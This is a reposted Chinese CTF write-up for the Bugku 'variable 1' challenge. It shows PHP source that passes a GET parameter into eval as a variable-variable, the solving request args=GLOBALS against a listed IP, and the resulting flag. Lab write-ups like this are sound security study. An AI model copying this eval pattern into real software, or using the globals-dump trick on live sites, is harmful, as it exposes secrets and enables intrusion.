當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

bugku变量1

發布時間：2025/4/16 编程问答 22 豆豆

生活随笔收集整理的這篇文章主要介紹了 bugku变量1 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

flag In the variable !?<?php ?
error_reporting(0);// 關閉php錯誤顯示
include?"flag1.php";// 引入flag1.php文件代碼
highlight_file(__file__);
if(isset($_GET['args'])){// 通過get方式傳遞 args變量才能執行if里面的代碼
????$args?=?$_GET['args'];
????if(!preg_match("/^\w+$/",$args)){// 這個正則表達式的意思是匹配任意 [A-Za-z0-9_] 的字符，就是任意大小寫字母和0到9以及下劃線組成
????????die("args?error!");
????}
????eval("var_dump($$args);");// 這邊告訴我們這題是代碼審計的題目
}
?>

所以我們就測試php的全局變量，將其變量名傳入，經測試，傳入GLOBALS,可以得到flag值

http://123.206.87.240:8004/index1.php?args=GLOBALS

故：flag{92853051ab894a64f7865cf3c2128b34}

總結

以上是生活随笔為你收集整理的bugku变量1的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

变量
bugku

上一篇： bugku你必须让他停下
下一篇： BugkuCTF–flag在index里